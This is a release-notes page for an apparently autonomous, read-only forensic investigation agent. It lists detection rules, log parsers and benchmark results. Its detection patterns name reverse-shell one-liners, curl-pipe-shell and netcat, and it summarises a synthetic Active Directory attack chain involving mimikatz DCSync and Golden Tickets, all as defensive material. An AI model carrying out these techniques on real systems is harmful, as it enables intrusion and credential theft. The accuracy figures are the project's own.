Releases: Juwon1405/agentic-dart
v1.2.0 — SANS Find Evil! 2026
Agentic-DART v1.2.0 — SANS Find Evil! 2026 submission build.
Autonomous DFIR agent on the SANS SIFT Workstation. The language model analyzes evidence in read-only mode and seals every inference into a SHA-256 audit chain. 73 typed, read-only MCP tools (48 native pure-Python + 25 SIFT-tool adapters) — destructive operations are absent from the tool registry and CI-enforced, so even a fully successful prompt injection has no destructive function to call. Architecture-first, not prompt-first.
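As an illustration of what sealing inferences into a SHA-256 audit chain can look like, here is a minimal sketch. It is not the project's implementation: the entry layout, the `GENESIS` placeholder, and the function names are assumptions made for this example.

```python
import hashlib
import json

GENESIS = "0" * 64  # assumed placeholder hash for the first entry


def entry_hash(prev_hash: str, payload: dict) -> str:
    """Hash the previous link together with a canonical JSON payload."""
    body = json.dumps(payload, sort_keys=True, separators=(",", ":"))
    return hashlib.sha256((prev_hash + body).encode("utf-8")).hexdigest()


def append_entry(chain: list, payload: dict) -> dict:
    """Append a payload, linking it to the hash of the last entry."""
    prev = chain[-1]["hash"] if chain else GENESIS
    entry = {"prev": prev, "payload": payload, "hash": entry_hash(prev, payload)}
    chain.append(entry)
    return entry


def verify_chain(chain: list) -> bool:
    """Recompute every link; an edited or reordered entry breaks the chain."""
    prev = GENESIS
    for entry in chain:
        if entry["prev"] != prev:
            return False
        if entry["hash"] != entry_hash(prev, entry["payload"]):
            return False
        prev = entry["hash"]
    return True


# Hypothetical inferences, for illustration only.
chain = []
append_entry(chain, {"tool": "parse_registry_hive", "claim": "hypothetical inference 1"})
append_entry(chain, {"tool": "detect_dns_tunneling", "claim": "hypothetical inference 2"})
```

Because each hash covers the previous hash, changing any earlier payload invalidates every later link, which is what makes the record tamper-evident.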
This release
- Sigma detection pack v2 — 11 rules (DCSync, Golden Ticket, ransomware shadow-copy deletion, web-shell creation, local account creation, Kerberoasting, AS-REP roasting, HID insertion, remote exec, event-log clearing).
- Model-aware authentication: Haiku resolves to an OAuth subscription token; Sonnet/Opus to a metered API key. New `dart-auth` command.
- Persistent install aliases: `dart-pull`, `dart-auth`.
- Unified per-case ledger: append-only, per-case timestamps.
- case-02 ground-truth fix — Hadi Challenge #1 is Windows XAMPP, not Linux; recall 0% -> 60%.
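To give a feel for how a Sigma-style rule is evaluated against a parsed event, the sketch below implements a deliberately small subset: a single `selection` map, plain equality, list values as OR, and the `contains` modifier. The two rules are illustrative stand-ins written for this example, not the rules shipped in the detection pack.

```python
def field_matches(event: dict, key: str, expected) -> bool:
    """Match one selection key; supports equality and the 'contains' modifier."""
    field, _, modifier = key.partition("|")
    actual = event.get(field)
    if actual is None:
        return False
    candidates = expected if isinstance(expected, list) else [expected]
    if modifier == "contains":
        return any(str(c).lower() in str(actual).lower() for c in candidates)
    return any(str(actual).lower() == str(c).lower() for c in candidates)


def rule_matches(rule: dict, event: dict) -> bool:
    """Evaluate a rule whose condition is the single word 'selection'."""
    detection = rule["detection"]
    if detection.get("condition") != "selection":
        raise ValueError("only 'condition: selection' is supported in this sketch")
    # Keys inside one selection are ANDed together.
    return all(field_matches(event, k, v) for k, v in detection["selection"].items())


# Illustrative rules, shaped like the dicts a YAML loader would return.
LOG_CLEARED = {
    "title": "Security event log cleared (illustrative)",
    "detection": {"selection": {"EventID": 1102}, "condition": "selection"},
}
SHADOW_DELETE = {
    "title": "Shadow copy deletion (illustrative)",
    "detection": {
        "selection": {
            "EventID": 4688,
            "CommandLine|contains": ["delete shadows", "shadowcopy delete"],
        },
        "condition": "selection",
    },
}

event = {"EventID": 4688, "CommandLine": "vssadmin.exe Delete Shadows /all /quiet"}
hits = [r["title"] for r in (LOG_CLEARED, SHADOW_DELETE) if rule_matches(r, event)]
```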
142 tests passing. Full history in CHANGELOG.md.
v1.1.0 — Stable release (SANS FIND EVIL! 2026)
Agentic-DART is an autonomous DFIR agent on the SANS SIFT Workstation. It runs a senior-analyst reasoning loop over a custom MCP server of 73 typed, read-only forensic tools (48 native pure-Python + 25 SIFT adapters) and produces a courtroom-traceable report. Evidence integrity is enforced by the shape of the system — destructive operations (execute_shell, write_file, mount) simply do not exist on the wire — not by asking the model to behave.
This is the first genuinely stable release, verified end-to-end from a clean clone.
Why 1.1.0 supersedes everything before it
Earlier tags that claimed "stable" did not actually run clean in a fresh environment. 1.1.0 is the result of a full correctness pass — install, benchmark, scoring, external disk-image handling, and the test suite all fixed and re-verified. The prior 1.0.2 "stable" tag has been removed to avoid confusion.
- Tests are green from anywhere. 156 tests pass. The Phase-2 placeholder suite is now explicitly skipped (not failed) wherever it's collected, so `pytest` is clean whether you run it from the repo root or any subdirectory.
- No version is pinned in docs or tests. The release number lives in `pyproject.toml` only; READMEs, the wiki, the site, and the version test were all genericized, so a future bump touches one file.
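A genericized version test could look roughly like the sketch below: it reads the version from `pyproject.toml` text and checks only its shape, never a specific number. The `[project]` table layout, the sample text, and both function names are assumptions for this example; the repository's actual test may differ.

```python
import re

try:
    import tomllib  # standard library from Python 3.11 onward
except ImportError:  # Python 3.10: fall back to a narrow regex
    tomllib = None

# Hypothetical file contents, for illustration only.
SAMPLE_PYPROJECT = """\
[project]
name = "agentic-dart"
version = "0.0.0"
"""


def read_project_version(pyproject_text: str) -> str:
    """Return the [project] version string from pyproject.toml text."""
    if tomllib is not None:
        return tomllib.loads(pyproject_text)["project"]["version"]
    match = re.search(
        r'(?ms)^\[project\].*?^version\s*=\s*"([^"]+)"', pyproject_text
    )
    if match is None:
        raise ValueError("no [project] version found")
    return match.group(1)


def looks_like_release(version: str) -> bool:
    """Check the shape MAJOR.MINOR.PATCH without pinning a specific number."""
    return re.fullmatch(r"\d+\.\d+\.\d+", version) is not None


version = read_project_version(SAMPLE_PYPROJECT)
```

A test built this way asserts `looks_like_release(version)` and therefore keeps passing across version bumps.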
Highlights
- 73 typed read-only MCP tools — 48 native forensic functions + 25 SIFT adapters (Volatility 3, MFTECmd, EvtxECmd, PECmd, RECmd, AmcacheParser, YARA, Plaso), plus a versioned Sigma detection-rule matcher.
- 11 case studies / 99 ground-truth findings across two tiers: 8 internal self-evaluation cases (ready evidence) + 3 external full-disk public images (NIST CFReDS Hacking Case, Ali Hadi DFIR Challenge #1, Digital Corpora M57).
- External is a first-class tier. Full-disk images are adapted via `ewfmount` + `mmls` + `tsk_recover` (partition-offset aware) into an evidence tree, then analyzed. Run the tiers as separate processes (`scripts.eval.demo` / `scripts.eval.self` / `scripts.eval.external`), each independently debuggable; an append-only `docs/benchmarks/HISTORY.md` records every self/external run.
- Linux-only host, hardened installer: refuses to run under sudo, stages the full toolchain, verifies it, and offers to fetch the external images at the end.
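The partition-offset handling mentioned for the external tier can be sketched as follows: parse the text that `mmls` prints and keep the start sector of each real partition, which is the value a tool such as `tsk_recover` accepts through its `-o` option. The sample output and the function name are illustrative assumptions; the project's adapter may work differently.

```python
import re

# One partition row: index, slot, start, end, length, description.
ROW = re.compile(r"^(\d+):\s+(\S+)\s+(\d+)\s+(\d+)\s+(\d+)\s+(.+)$")
SECTOR = re.compile(r"Units are in (\d+)-byte sectors")

# Illustrative mmls output for a single-partition DOS-labelled image.
SAMPLE_MMLS = """\
DOS Partition Table
Offset Sector: 0
Units are in 512-byte sectors

      Slot      Start        End          Length       Description
000:  Meta      0000000000   0000000000   0000000001   Primary Table (#0)
001:  -------   0000000000   0000000062   0000000063   Unallocated
002:  000:000   0000000063   0009510479   0009510417   NTFS / exFAT (0x07)
"""


def parse_mmls(text: str) -> list:
    """Return allocated partitions with their sector and byte offsets."""
    found = SECTOR.search(text)
    sector_size = int(found.group(1)) if found else 512
    partitions = []
    for line in text.splitlines():
        row = ROW.match(line.strip())
        if not row:
            continue
        slot = row.group(2)
        # Skip partition-table metadata and unallocated gaps.
        if slot == "Meta" or slot.startswith("-"):
            continue
        start = int(row.group(3))
        partitions.append(
            {
                "start_sector": start,
                "byte_offset": start * sector_size,
                "length_sectors": int(row.group(5)),
                "description": row.group(6).strip(),
            }
        )
    return partitions


partitions = parse_mmls(SAMPLE_MMLS)
```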
Requirements / dependencies
Host OS — Linux only. Verified on the SANS SIFT Workstation (Ubuntu 22.04); RHEL / Rocky / AlmaLinux 8+ and Fedora work via dnf/yum. macOS and Windows are not supported as the host — the Plaso / libyal toolchain does not build cleanly there. Default shell is bash.
| Requirement | Version | Verified |
|---|---|---|
| Python | 3.10+ (CI: 3.10 – 3.13) | 3.10, 3.12 |
| OS | Ubuntu 22.04 (SANS SIFT) primary; RHEL/Rocky/Alma 8+, Fedora | SIFT |
Python libraries (lower bounds; installed by scripts/install.sh):
| Library | Minimum | Role |
|---|---|---|
| `anthropic` | ≥ 0.40 | Claude API client (live mode) |
| `mcp` | ≥ 1.0 | MCP client/server transport |
| `duckdb` | ≥ 1.5.3, < 2.0 | in-memory correlation store |
| `python-registry` | ≥ 1.3 | Windows registry hive parsing |
| `PyYAML` | ≥ 6.0 | playbook / Sigma rule loading |
| `requests` | ≥ 2.25 | dataset download (benchmarks) |
External forensic tools (staged by the installer; SIFT ships most): sleuthkit (mmls, tsk_recover), ewfmount (ewf-tools / libewf), Volatility 3, Plaso (log2timeline.py, psort.py), EZ Tools, YARA, Velociraptor.
Install
git clone https://github.com/Juwon1405/agentic-dart.git
cd agentic-dart
bash scripts/install.sh # Linux only; refuses sudo. Offers to fetch external images (~13 GB).
export ANTHROPIC_API_KEY='sk-ant-...'
python3 -m scripts.eval.demo # deterministic, no key
python3 -m scripts.eval.self --models claude-haiku-4-5-20251001 # 8 bundled cases
python3 -m scripts.eval.external --models claude-haiku-4-5-20251001 # public disk images

License: MIT. SANS FIND EVIL! 2026 submission.
v1.0.1 — Platform overhaul: run_eval CLI, tiered case layout, OS-aware installer
Highlights
- `run_eval.py`: the new primary user-facing command. Live mode only: fails fast with an actionable message when `ANTHROPIC_API_KEY` is unset; discovers cases dynamically from both tiers; writes `out/<tier>/<case-id>/<timestamp>/{findings,report,summary}.json`.
- Tiered, self-contained case studies: `examples/case-studies/self-evaluation/case-01..08` and `external-evaluation/case-01..03` (NIST CFReDS, Ali Hadi, Digital Corpora M57-Patents/Jo). Index-only folder names, `truth.json` per case, canonical bundled evidence at `self-evaluation/case-01/evidence_root/`. The public `--variant` selector is gone.
- OS-aware installer: `scripts/install.sh --os auto|ubuntu|centos|macos`, venv-first, clones and installs the collector adapter, optional SIFT (`--install-sift`, via cast) and Eric Zimmerman Tools (`--install-eztools`, .NET 9 builds, URLs validated before download). Plus root `requirements.txt` and an API-free `scripts/healthcheck.py`.
- Downloader hardening: browser-like headers on every request (incl. resumed range requests), pure-Python streaming split-image reassembly, `--dry-run` / `--check-urls`.
- Hardening (earlier in this line): MCP `call_tool()` schema validation before dispatch, Plaso outputs isolated to `DART_DERIVED_ROOT`, benchmark summary no longer fabricates rows, hallucination scoring requires resolvable audit IDs.
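The idea of validating a tool call against its schema before dispatch can be sketched as below. This is a simplified stand-in, not the server's code: the registry layout, the `ToolCallError` class, and the argument names for `parse_registry_hive` are hypothetical.

```python
class ToolCallError(ValueError):
    """Raised when a call is rejected before reaching any handler."""


# Hypothetical registry: only read-only tools are present, so a destructive
# name such as execute_shell has nothing to resolve to.
TOOLS = {
    "parse_registry_hive": {
        "handler": lambda args: {"hive": args["hive_path"], "keys": []},
        "required": {"hive_path": str},
        "optional": {"max_keys": int},
    },
}


def call_tool(name: str, arguments: dict):
    """Validate name, argument names, and argument types, then dispatch."""
    spec = TOOLS.get(name)
    if spec is None:
        raise ToolCallError(f"unknown tool: {name}")
    allowed = {**spec["required"], **spec["optional"]}
    unknown = set(arguments) - set(allowed)
    if unknown:
        raise ToolCallError(f"unexpected arguments: {sorted(unknown)}")
    missing = set(spec["required"]) - set(arguments)
    if missing:
        raise ToolCallError(f"missing arguments: {sorted(missing)}")
    for key, value in arguments.items():
        if not isinstance(value, allowed[key]):
            raise ToolCallError(f"{key} must be {allowed[key].__name__}")
    return spec["handler"](arguments)


result = call_tool("parse_registry_hive", {"hive_path": "SYSTEM", "max_keys": 10})
```

Rejecting the call before dispatch means a malformed or injected request never reaches a handler, which matches the fail-closed posture described in these notes.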
Measured QA at this tag
- Full pytest suite green (`tests/` + `dart_corr/tests/`); `benchmark-integrity` and `CI` workflows green on this commit.
- `scripts/measure_accuracy.py`: recall 1.0, FPR 0.0, hallucinations 0, evidence integrity preserved (67 files).
- `validate_ground_truth.py`: FAIL 0 (6 documented external-tier warnings).
Known limitations
- The adapter's `--source image` (Velociraptor dead-disk) path is covered by mocked end-to-end tests and has not been exercised against a live Velociraptor binary in CI.
- External-tier evaluations require a one-time multi-GB dataset download; no external-dataset accuracy numbers are claimed at this tag.
Full details: CHANGELOG.md
v0.7.1 — Linux DFIR triplet + ground-truth function reconciliation
Highlights
Closed 6 of 10 missing-function gaps identified by a post-release MCP surface audit against the 11-case ground-truth library.
Added — Linux DFIR triplet (2 new MCP functions)
- `parse_linux_text_log`: parses Apache/nginx combined access logs, syslog (RFC3164), `/var/log/messages`, `/var/log/secure`, and auditd dispatcher text mode. Returns parsed records plus suspicious-content tags across 10 patterns covering T1003.008 shadow read, T1190 path traversal + SQLi, T1505.003 webshell patterns, T1105 remote download to shell, T1071.001 netcat, T1046 scanner invocation, T1222.002 dangerous chmod, T1059.004 reverse-shell oneliners, T1213.002 database credential use, plus a scanner-user-agent meta-rule (T1595.002).
- `parse_linux_shell_history`: parses bash/zsh history with HISTTIMEFORMAT awareness (epoch comment lines). Detects 11 attacker patterns including T1098.004 SSH key persistence, T1070.003 history clear, T1053.003 cron mutation, T1027 base64 obfuscation.
(parse_linux_cron_jobs already existed in v0.6.1 — exposed via evidence_root + flagged_only schema. Not duplicated.)
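The HISTTIMEFORMAT handling described for `parse_linux_shell_history` can be illustrated with a small sketch: bash writes a `#<epoch>` comment line before each command, so the parser pairs every such line with the command that follows. The four regexes are rough stand-ins chosen for this example, not the function's real pattern set, and the record layout is an assumption.

```python
import re
from datetime import datetime, timezone

EPOCH_LINE = re.compile(r"^#(\d{9,10})$")

# Illustrative patterns only; the shipped function documents 11 of them.
PATTERNS = {
    "T1098.004": re.compile(r">>?\s*\S*\.ssh/authorized_keys"),
    "T1070.003": re.compile(r"\bhistory\s+-c\b|\bunset\s+HISTFILE\b"),
    "T1053.003": re.compile(r"\bcrontab\s+-e\b|\|\s*crontab\b|/etc/cron"),
    "T1027": re.compile(r"\bbase64\s+(-d|--decode)\b"),
}

SAMPLE_HISTORY = """\
#1700000000
whoami
#1700000060
echo ssh-rsa AAAAexample >> ~/.ssh/authorized_keys
history -c
"""


def parse_history(text: str) -> list:
    """Pair each command with the epoch comment line that precedes it."""
    records = []
    pending = None
    for raw in text.splitlines():
        line = raw.rstrip()
        if not line:
            continue
        stamp = EPOCH_LINE.match(line)
        if stamp:
            pending = datetime.fromtimestamp(int(stamp.group(1)), tz=timezone.utc)
            continue
        tags = sorted(t for t, p in PATTERNS.items() if p.search(line))
        records.append(
            {
                "timestamp": pending.isoformat() if pending else None,
                "command": line,
                "tags": tags,
            }
        )
        pending = None  # a timestamp applies to one command only
    return records


records = parse_history(SAMPLE_HISTORY)
```

Commands without a preceding epoch line keep a `None` timestamp rather than inheriting the previous one, which avoids inventing times for entries the shell never stamped.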
Changed — case-09 ground-truth function names reconciled
Pre-v0.7.1 case-09 (Ali Hadi Challenge 1) referenced three functions that did not exist in the MCP surface. Now mapped to actual capabilities:
| Finding | Pre-v0.7.1 (missing) | v0.7.1 (implemented) |
|---|---|---|
| F-HADI1-002 | `detect_web_shell_indicators` | `detect_webshell` |
| F-HADI1-007 | `enumerate_filesystem_anomalies` | `parse_linux_text_log` |
| F-HADI1-009 | `detect_log_tampering_indicators` | `detect_defense_evasion` |
Ground-truth coverage post-reconciliation
Of 36 expected functions referenced across all 11 cases:
- 32 implemented (89%)
- 4 remain as tracked Phase 2 gaps: `parse_recycle_bin_metadata` (#54), `parse_ie_history` (#53), `parse_outlook_dbx` (#55), `parse_usn_journal` (post-release issue)
Added — test coverage
tests/test_parse_linux_dfir.py — 7 new tests covering auditd dispatcher format, http access combined format (Nikto UA + path traversal + shadow read), HISTTIMEFORMAT epoch parsing, per-hit required-keys contract, missing-file error contract, path traversal rejection. Total suite: 75 green (up from 68).
Added — sample evidence
examples/sample-evidence-realistic/linux/cron/sample.crontab — fixture exercising v0.6.1 parse_linux_cron_jobs with 4 suspicious patterns (remote-pipe-shell, exec from world-writable, reverse-shell oneliner, base64 obfuscation) plus benign baseline jobs.
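The four suspicious patterns named for the crontab fixture can be approximated with the sketch below. The regexes, the sample crontab, and the assumption of user-crontab syntax (five time fields, no user column) are all illustrative; `parse_linux_cron_jobs` itself may flag entries differently.

```python
import re

# Rough stand-ins for the four pattern families named above.
CRON_FLAGS = {
    "remote-pipe-shell": re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba)?sh\b"),
    "world-writable-exec": re.compile(r"(^|\s)/(tmp|var/tmp|dev/shm)/\S+"),
    "reverse-shell": re.compile(r"/dev/tcp/|\bnc\b.*\s-e\s"),
    "base64-obfuscation": re.compile(r"\bbase64\s+(-d|--decode)\b"),
}

# Synthetic crontab using RFC 5737 documentation addresses.
SAMPLE_CRONTAB = """\
# nightly housekeeping
0 3 * * * /usr/bin/logrotate /etc/logrotate.conf
*/5 * * * * curl -s http://203.0.113.10/a.sh | sh
@reboot /tmp/.x/agent
* * * * * bash -i >& /dev/tcp/203.0.113.10/4444 0>&1
30 2 * * * echo ZWNobyBoaQ== | base64 -d | bash
"""


def cron_command(line: str):
    """Return the command part of a user-crontab line, else None."""
    stripped = line.strip()
    if not stripped or stripped.startswith("#"):
        return None
    if stripped.startswith("@"):  # @reboot, @daily, ...
        parts = stripped.split(None, 1)
        return parts[1] if len(parts) == 2 else None
    parts = stripped.split(None, 5)  # five time fields, then the command
    return parts[5] if len(parts) == 6 else None


def flag_crontab(text: str) -> list:
    """Return flagged entries with their 1-based line number and flags."""
    flagged = []
    for number, line in enumerate(text.splitlines(), start=1):
        command = cron_command(line)
        if command is None:
            continue
        flags = [name for name, rx in CRON_FLAGS.items() if rx.search(command)]
        if flags:
            flagged.append({"line": number, "command": command, "flags": flags})
    return flagged


flagged = flag_crontab(SAMPLE_CRONTAB)
```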
Post-release counts
| Surface | Value |
|---|---|
| Native MCP functions | 72 (was 67) |
| Total ground-truth findings | 99 |
| Ground-truth coverage (implemented / expected) | 32 / 36 (89%) |
| Bundled case studies | 11 |
| Unit tests | 75 green (was 68) |
Verification
recall: 1.000 (F-001 + F-013)
false_positive_rate: 0.000
hallucination_count: 0
evidence_integrity_preserved: true
self_correction_observed: true
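For readers who want to see how figures like these could be derived, here is a hedged sketch of a scorer. The definitions are assumptions made for the example: recall is the share of expected findings reported, the false-positive rate is the share of known-benign decoy items that were reported, and a hallucination is a reported finding whose audit ID does not resolve in the audit chain. The decoy and audit IDs are hypothetical, and `scripts/measure_accuracy.py` may define these metrics differently.

```python
def score_run(expected_ids: set, reported: list, benign_ids: set, audit_ids: set) -> dict:
    """Score one run against ground truth and the audit chain."""
    reported_ids = {finding["id"] for finding in reported}
    true_positives = reported_ids & expected_ids
    false_positives = reported_ids & benign_ids
    hallucinated = [
        finding["id"]
        for finding in reported
        if finding.get("audit_id") not in audit_ids
    ]
    return {
        "recall": len(true_positives) / len(expected_ids) if expected_ids else 0.0,
        "false_positive_rate": (
            len(false_positives) / len(benign_ids) if benign_ids else 0.0
        ),
        "hallucination_count": len(hallucinated),
    }


# F-001 and F-013 come from the output above; everything else is hypothetical.
expected = {"F-001", "F-013"}
benign = {"B-001", "B-002"}
audit_chain_ids = {"a1", "a2", "a3"}
reported = [
    {"id": "F-001", "audit_id": "a1"},
    {"id": "F-013", "audit_id": "a3"},
]

scores = score_run(expected, reported, benign, audit_chain_ids)
```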
Compare: v0.7.0...v0.7.1
v0.7.0 — case-11 supply-chain/ESC8 + evidence schema fidelity
Highlights
Two major additions targeted at the SANS FIND EVIL! 2026 submission.
case-11 supply-chain entry → AD certificate-services abuse
examples/case-studies/case-11-supplychain-ad-zeroday/ ships 12 ground-truth findings reproduced deterministically by seven MCP functions on bundled evidence. The chain:
- Trojanized signed vendor binary (SolarWinds SUNBURST class entry, T1195.002)
- Low-and-slow C2 beaconing with calibrated sub-SIEM-threshold cadence
- PetitPotam (CVE-2021-36942) coercion of `DC01$` (T1187)
- ntlmrelayx `--adcs` relay to CA01 Web Enrollment endpoint (T1557.001)
- Certificate issued for `DC01$` under DomainController template (ESC8, T1649)
- Rubeus `asktgt /certificate` + `s4u /impersonateuser:domadmin` (T1550.003)
- 4624 type-9 NewCredentials on DC (S4U2self DA impersonation)
- PsExec / wmiexec overpass-the-hash lateral to DC, file server, endpoint (T1021.002, T1021.006, T1550.002)
- ntdsutil `ifm create full` (T1003.003) + mimikatz `dcsync /user:krbtgt` (T1003.006)
- AdminSDHolder ACL modification (T1098.005; self-healing privileged persistence via SDProp)
- Golden Ticket forged with KRBTGT hash (T1558.001) used next morning
- Three sequential `wevtutil cl` + EventID 1102 self-emission (T1070.001)
Chain composed entirely from public references (CISA AA20-352A, SpecterOps "Certified Pre-Owned", MS-EFSRPC CVE, MITRE T1098.005/T1003.006/T1558.001). All hosts/IPs/domain (ent.example.local)/SIDs are RFC1918/RFC5737/RFC2606 synthetic with zero cross-reference to any real environment.
Every sample evidence file enriched to native forensic-tool dump fidelity
Prior versions of sample-evidence-realistic/ files were too sparse to look like genuine forensic-tool captures. This release replaces every file with the on-disk schema produced by the corresponding real tool — without breaking any detection.
| Surface | Now matches output of |
|---|---|
| Windows event logs | EvtxECmd (full EVTX field set, ms timestamps, consistent SIDs) |
| Network flows | Zeek conn.log (uid, ja3, ja3s, tls_version, http_method, user_agent) |
| $MFT | MFTECmd 25-column (both 0x10 SI and 0x30 FN timestamps, USN, LSN, SecurityId) |
| Shellbags | SBECmd (BagPath, NodeSlot, AbsolutePath, LastInteracted, HasExplored) |
| Run keys / services / shimcache | RECmd / AppCompatCacheParser |
| Prefetch | PECmd JSON (Volumes, FilesLoaded, run times) |
| Chrome History | Hindsight (transition, danger_type, opened, referrer, etag) |
| Linux journal | systemd-journald (__REALTIME_TIMESTAMP, _BOOT_ID, _MACHINE_ID, _AUDIT_LOGINUID) |
| Linux auditd | SYSCALL+EXECVE+CWD+PATH+PROCTITLE+USER_LOGIN+CRED_ACQ+USER_CMD+USER_AUTH |
| macOS unified log | log show (thread, type, subsystem, category, sender) |
| macOS FSEvents | FSEventsParser (id, mask, flags, inode, node_id, sha256_at_event) |
| Memory image info | winpmem metadata (kernel_base, KDBG offset, physical layout, yara hits) |
Fixed
- `setupapi.dev.log` was missing from the realistic variant, so the agent's F-013 IP-KVM detection silently failed and recall dropped to 0.5 on `--variant realistic`. Restored with full setupapi log fidelity around the IP-KVM (VID 0557 PID 2419 ATEN) signal.
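To show why the missing file mattered, the sketch below scans setupapi-style text for device-install sections whose USB vendor and product IDs are on a watchlist. The sample log lines, the watchlist structure, and the function name are assumptions for illustration; only the VID 0557 / PID 2419 pair comes from these notes.

```python
import re

SECTION = re.compile(r"^>>>\s+\[(?P<title>.+)\]\s*$")
START = re.compile(
    r"^>>>\s+Section start (?P<ts>\d{4}/\d{2}/\d{2} \d{2}:\d{2}:\d{2}\.\d{3})"
)
USB_ID = re.compile(r"USB\\VID_(?P<vid>[0-9A-Fa-f]{4})&PID_(?P<pid>[0-9A-Fa-f]{4})")

WATCHLIST = {("0557", "2419"): "ATEN IP-KVM"}

# Synthetic excerpt shaped like setupapi.dev.log device-install sections.
SAMPLE_LOG = r"""
>>>  [Device Install (Hardware initiated) - USB\VID_046D&PID_C31C\5&1a2b3c&0&1]
>>>  Section start 2026/01/15 09:10:02.004
<<<  Section end 2026/01/15 09:10:03.110
>>>  [Device Install (Hardware initiated) - USB\VID_0557&PID_2419\5&1a2b3c&0&2]
>>>  Section start 2026/01/15 09:12:44.120
<<<  Section end 2026/01/15 09:12:45.300
"""


def find_watchlisted(text: str) -> list:
    """Return watchlisted USB installs with their section start time."""
    hits = []
    pending = None
    for line in text.splitlines():
        section = SECTION.match(line)
        if section:
            usb = USB_ID.search(section.group("title"))
            key = (usb.group("vid").upper(), usb.group("pid").upper()) if usb else None
            pending = key if key in WATCHLIST else None
            continue
        start = START.match(line)
        if start and pending:
            hits.append(
                {
                    "vid": pending[0],
                    "pid": pending[1],
                    "label": WATCHLIST[pending],
                    "section_start": start.group("ts"),
                }
            )
            pending = None
    return hits


hits = find_watchlisted(SAMPLE_LOG)
```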
Post-release counts
| Surface | Value |
|---|---|
| Native MCP functions | 67 |
| Total ground-truth findings | 99 |
| ↳ Layer 1 (8 cases: 01–07 + 11) | 69 |
| ↳ Layer 2 (3 cases: 08 CFReDS, 09 Hadi, 10 M57) | 30 |
| Bundled case studies | 11 |
| Evidence files in realistic variant | 49 |
| MITRE ATT&CK tactic coverage | 11 of 12 |
| Unit tests | 68 green |
Verification
recall: 1.000 (F-001 + F-013)
false_positive_rate: 0.000
hallucination_count: 0
evidence_integrity_preserved: true
self_correction_observed: true
audit_chain_length: 3 entries, SHA-256-linked
Full Changelog
See CHANGELOG.md for the complete diff.
Compare: v0.6.1...v0.7.0
v0.6.1 — macOS quarantine + Linux cron + DNS tunneling
Three new native MCP functions, plus the Single-Source-of-Truth cleanup that closes the v0.6.0 drift loop.
Added
| Function | Purpose | MITRE |
|---|---|---|
| `parse_macos_quarantine` | macOS LSQuarantineEvent reader: download provenance, non-browser downloader flagging, pastesite/raw-IP/darknet origin detection | T1204, T1566.002, T1105 |
| `parse_linux_cron_jobs` | Enumerate `/etc/crontab`, `cron.d/`, `cron.{hourly,daily,weekly,monthly}/`, `/var/spool/cron/`; flag curl-pipe-shell, base64 decode, `@reboot` triggers, `/tmp/*.sh`, netcat listeners | T1053.003, T1059.004, T1546 |
| `detect_dns_tunneling` | DNS query log analysis (BIND9/dnsmasq/generic): Shannon entropy + long-label + rare-qtype + volume + Iodine/dnscat2 signatures. Opens TA0011 (Command-and-Control) coverage | T1071.004, T1568.002, T1572 |
17 new unit tests in test_v06_macos_linux.py. Full test suite passes on a clean clone.
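Two of the signals listed for `detect_dns_tunneling`, Shannon entropy and long labels, can be sketched as follows. The thresholds, the choice to score the longest label, and the function names are assumptions for this example rather than the shipped heuristics.

```python
import math
from collections import Counter


def shannon_entropy(text: str) -> float:
    """Entropy in bits per character of the given string."""
    if not text:
        return 0.0
    total = len(text)
    counts = Counter(text)
    return -sum((n / total) * math.log2(n / total) for n in counts.values())


def score_query(qname: str, entropy_threshold: float = 3.5,
                label_len_threshold: int = 40) -> dict:
    """Score one query name on its longest label (thresholds are assumed)."""
    labels = [label for label in qname.rstrip(".").split(".") if label]
    longest = max(labels, key=len) if labels else ""
    entropy = shannon_entropy(longest)
    long_label = len(longest) >= label_len_threshold
    high_entropy = entropy >= entropy_threshold
    return {
        "longest_label": longest,
        "entropy": entropy,
        "long_label": long_label,
        "high_entropy": high_entropy,
        "suspicious": long_label or high_entropy,
    }


benign = score_query("www.example.com")
# Hex-encoded payload in the leftmost label, a common tunneling shape.
tunnel = score_query("4a6f686e20446f6520736563726574206461746120313233.t.example.net")
```

A production detector would combine these with the rare-qtype, volume, and signature checks named above, since entropy alone also fires on legitimate CDN and telemetry hostnames.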
Fixed
- CI workflow (`ci.yml`), `examples/sift-adapter-demo.sh`, and `scripts/install.sh` no longer hardcode native/total counts. Drift-safe invariant checks (count > 0, native + sift == total, no forbidden tool names) replaced exact-count assertions.
- This was the root cause of ten consecutive failed CI runs between v0.6.0 (2026-05-13) and the SoT cleanup commit on 2026-05-14.
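The drift-safe invariants listed above can be expressed without any hardcoded count, as in this sketch. The function name, the way the tool lists are passed in, and the adapter name `sift_example_adapter` are hypothetical; the forbidden names are the destructive operations these notes say do not exist on the wire.

```python
FORBIDDEN = {"execute_shell", "write_file", "mount"}


def check_surface(all_tools: list, native: list, sift: list) -> list:
    """Return violated invariants; an empty list means the surface is sound."""
    problems = []
    if len(all_tools) == 0:
        problems.append("tool count must be > 0")
    if len(native) + len(sift) != len(all_tools):
        problems.append("native + sift must equal total")
    leaked = sorted(FORBIDDEN & set(all_tools))
    if leaked:
        problems.append(f"forbidden tool names present: {leaked}")
    return problems


# Small illustrative surface; real lists would come from list_tools().
native_tools = ["parse_registry_hive", "detect_dns_tunneling"]
sift_tools = ["sift_example_adapter"]  # hypothetical adapter name
surface = native_tools + sift_tools

problems = check_surface(surface, native_tools, sift_tools)
```

Adding or removing a tool changes the lists but not the assertions, so the checks stay green across releases as long as the invariants hold.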
Changed
- Companion repo agentic-dart-collector-adapter flipped from Apache-2.0 to MIT for ecosystem consistency.
- Hardcoded counts removed from ~25 locations across README body, docs, wiki, and profile surfaces. Numbers now live only in: README L92+L259 Hero, DEVPOST_SUBMISSION.md, DEMO_STORYBOARD.md, and the `tests/test_mcp_surface.py` canonical name set.
Surface
Runtime list_tools() returns the typed read-only MCP surface (45 native pure-Python forensic functions + 25 SIFT Workstation adapters). The canonical name set is asserted in tests/test_mcp_surface.py::test_registered_tools_are_exact_set.
Full changelog: CHANGELOG.md
v0.5.4 — NIST CFReDS Hacking Case integration
NIST CFReDS Hacking Case integration — external benchmark validation
This release adds external benchmark validation against the NIST CFReDS "Hacking Case" (Greg Schardt / Mr. Evil) — a community-trusted forensic dataset with published ground-truth answers.
Highlights
- 🆕 New primitive: `parse_registry_hive` (general native registry hive parser)
- 🆕 New case study: `case-08` (CFReDS Hacking Case full traversal)
- 📊 3-tier accuracy evaluation now documented in `docs/accuracy-report.md`:
| Tier | Dataset | recall (v0.5.4) |
|---|---|---|
| 1 | Synthetic reference (CI baseline) | 1.000 / FPR=0.000 |
| 2 | Noise-injected realistic (~1:30 IOC:benign) | 1.000 / FPR=0.000 |
